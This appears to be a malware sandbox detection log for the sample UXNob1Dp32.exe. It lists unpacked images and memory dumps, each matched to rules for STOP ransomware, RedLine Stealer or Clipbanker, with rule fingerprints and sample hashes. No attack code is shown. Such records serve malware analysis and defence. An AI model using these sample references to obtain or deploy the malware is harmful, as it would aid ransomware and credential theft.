Source: 23.2.UXNob1Dp32.exe.5de15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000002.1752670364.0000000001ADE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001F.00000002.3619043820.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001F.00000002.3619043820.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001D.00000002.3032813684.0000000000A00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000C.00000002.1815436829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000002.1815436829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000002.1981826365.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000002.2077605846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.2077605846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000014.00000002.4080039509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000014.00000002.4080039509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001A.00000002.2386525416.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001A.00000002.2386525416.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2065451364.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000A.00000002.1804523922.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.1879406390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.1879406390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2065195987.000000000446D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001E.00000002.3032277609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001E.00000002.3032277609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001B.00000002.2385413925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001B.00000002.2385413925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001D.00000002.3032732772.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001D.00000002.3032732772.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001A.00000002.2386315733.0000000000820000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.1981619549.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000011.00000002.1981619549.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.1870730144.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.1870730144.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000003.00000002.1652876016.000000000441E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.1628654696.0000000004264000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.3618417381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000020.00000002.3618417381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
